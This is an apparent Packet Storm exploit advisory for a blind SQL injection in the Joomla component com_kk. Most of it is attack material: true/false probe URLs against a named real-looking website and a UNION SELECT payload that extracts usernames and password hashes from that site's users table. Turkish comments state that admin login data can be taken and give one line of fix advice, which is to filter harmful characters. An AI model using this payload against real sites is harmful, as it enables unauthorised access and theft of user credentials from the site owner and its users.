Joomla KK SQL Injection

2010-01-07T00:00:00
ID PACKETSTORM:84883
Type packetstorm
Reporter Pyske
Modified 2010-01-07T00:00:00

Description

                                        
                                            `  
<------------------- header data start ------------------- >  
  
#############################################################  
# Joomla Component com_kk Blind SQL Injection Vulnerability   
#############################################################  
  
# Author : Pyske | Bug Researchers   
  
  
# Name : com_kk  
  
  
# Bug Type : Blind SQL Injection  
  
  
# Infection : Admin login bilgileri alinabilir.  
  
  
# Demo Vuln. :  
  
TRUE(+)  
  
http://www.klh-trade.si/index.php?option=com_kk&kat=1 and 1=1  
  
FALSE(-)  
  
http://www.klh-trade.si/index.php?option=com_kk&kat=1 and 1=0  
  
# Bug Fix Advice : Zararli karakterler filtrelenmelidir.  
  
#############################################################  
  
< ------------------- header data end of ------------------- >  
  
< -- bug code start -- >  
  
path /index.php?option=com_kk&kat=1/**/and/**/1=0/**/union/**/select/**/0,concat(username,0x3a,password)/**/from/**/klhtrade_users  
  
< -- bug code end of -- >   
_________________________________________________________________  
  
  
_________________________________________________________________  
Yeni Windows 7: Size en uygun bilgisayarý bulun. Daha fazla bilgi edinin.  
http://windows.microsoft.com/shop  
`